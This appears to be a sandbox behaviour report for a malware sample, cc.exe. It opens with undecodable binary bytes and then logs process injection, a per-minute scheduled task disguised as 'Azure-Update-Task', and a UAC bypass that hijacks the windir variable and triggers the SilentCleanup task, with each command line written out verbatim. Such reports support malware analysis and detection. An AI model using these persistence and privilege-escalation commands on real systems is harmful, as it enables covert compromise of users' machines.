@ÌUììXSVWjD_W3ÛE¨SPñÿ(0@jEì}¨SPÿ(0@Ähj@ÿ0@ºx(@EüMüèºÄ(@Müèºè(@MüèrÖMüèhºø(@Müè[}üEìPE¨PSShSSSWh)@ÿ @ÀuÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì5 @ÿÖÿuðÿÖÿtWÿ00@3À@_^[ÉÃUì3ÀÒtúÿÿÿv¸WÀxHÒt+VW}¾þÿÿ+ò+ùÀt·fÀtfÁêuå_^ÒAþEÁ3ÉÒf¸zEÁë Òt3Òf]ÂUìQSVWjl[òùj1Xf9¤Vÿ 0@ø"j0Vÿ0@ÀjOVÿ0@ÀuvjIVÿ0@ÀuiSVÿ0@Àu]Vÿ7ÿT0@ØÛtKÓ+ÑúRèºP @YMüEüèûVÿ 0@MüCèé?tÿ7ÿ @Eü3À@éýjl[f>3ufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèàº @éYÿÿÿVÿ 0@jcYjb[øu[f9uVf9NuPj1Xf9FuGjO^Sÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèvºà @éïþÿÿjb[Vÿ 0@øu^f9uYf~nuRf9^uLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè º%@éþÿÿf>LuiVÿ 0@ø"u]j0Vÿ0@ÀuPjOVÿ0@ÀuCjIVÿ0@jl[Àu6SVÿ0@ÀuVÿ7ÿT0@ØÛtÓ+ÑúRèº8!@éþÿÿjl[f>MufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè+º!@é¤ýÿÿVÿ 0@ø+udjlXf9u\f~tuUjcXf9FuLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè»ºÈ!@é4ýÿÿÎèêÀt'Vÿ7ÿT0@ØÛtÓ+ÑúRèº base_address: 0x00403000 process_identifier: 668 process_handle: 0x00000530		0
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: Ü0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~00000¤0©0¯0µ0º0À0Æ0Ë0Ñ0×0Ü0â0è0í0ó0ù0þ01 1111#1)1/141:1@1E1K1Q1V1]1b1i1n1t1z111111¡1¦1¬1²1·1½1Ã1È1Ï1×1Ý1ã1ë1ò1÷1ý122222 2%2+21262<2B2G2M2S2X2^2d2k222¨2µ2Â2Ô2Ù2æ2ú2!343Q3a3q3v333ª3Í3Ó3â3ñ3ú34¤4¶4Ç4Ô4à4í45515N5\5i5v555¨5´5ß5ì5ù56!6L6Y6f6666¬6¹6È6Õ6î6777+777D7]7i77§7´7Í7æ7ÿ7818J8c8\|88¡8Ô8í8ù8949U9`9g9q9y99999®9»9È9Õ9Û9ó9ý9::5:G:³:õ:;9;C;S;^;)<6<G<h<<Ï<û<y==¢=>>>(>=>>©>¶>Ã>å>v???? $D9H9L9P9T9X9\9`9d9h9l9p9t9x9 base_address: 0x00404000 process_identifier: 668 process_handle: 0x00000530	1	1
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 668 process_handle: 0x00000530	1	1
NtSetContextThread June 4, 2021, 6:10 p.m.	registers.eip: 5348 registers.esp: 68586792 registers.edi: 0 registers.eax: 4200932 registers.ebp: 5344 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000052c process_identifier: 668	1	0
NtResumeThread June 4, 2021, 6:10 p.m.	thread_handle: 0x0000052c suspend_count: 1 process_identifier: 668	1	0
CreateProcessInternalW June 4, 2021, 6:10 p.m.	thread_identifier: 1808 thread_handle: 0x00000534 process_identifier: 2408 current_directory: C:\Users\Public\ filepath: track: 1 command_line: "C:\Users\Public\Trast.bat" filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000538	1	1
CreateProcessInternalW June 4, 2021, 6:12 p.m.	thread_identifier: 1828 thread_handle: 0x000000ac process_identifier: 2100 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1
CreateProcessInternalW June 4, 2021, 6:12 p.m.	thread_identifier: 2944 thread_handle: 0x00000088 process_identifier: 2984 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
NtResumeThread June 4, 2021, 6:12 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2984	1	0
CreateProcessInternalW June 4, 2021, 6:12 p.m.	thread_identifier: 2296 thread_handle: 0x00000088 process_identifier: 1420 current_directory: C:\Users\Public filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete hkcu\Environment /v windir /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW June 4, 2021, 6:12 p.m.	thread_identifier: 620 thread_handle: 0x00000084 process_identifier: 2020 current_directory: C:\Users\Public filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW June 4, 2021, 6:12 p.m.	thread_identifier: 204 thread_handle: 0x00000088 process_identifier: 2388 current_directory: C:\Users\Public filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1

cc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All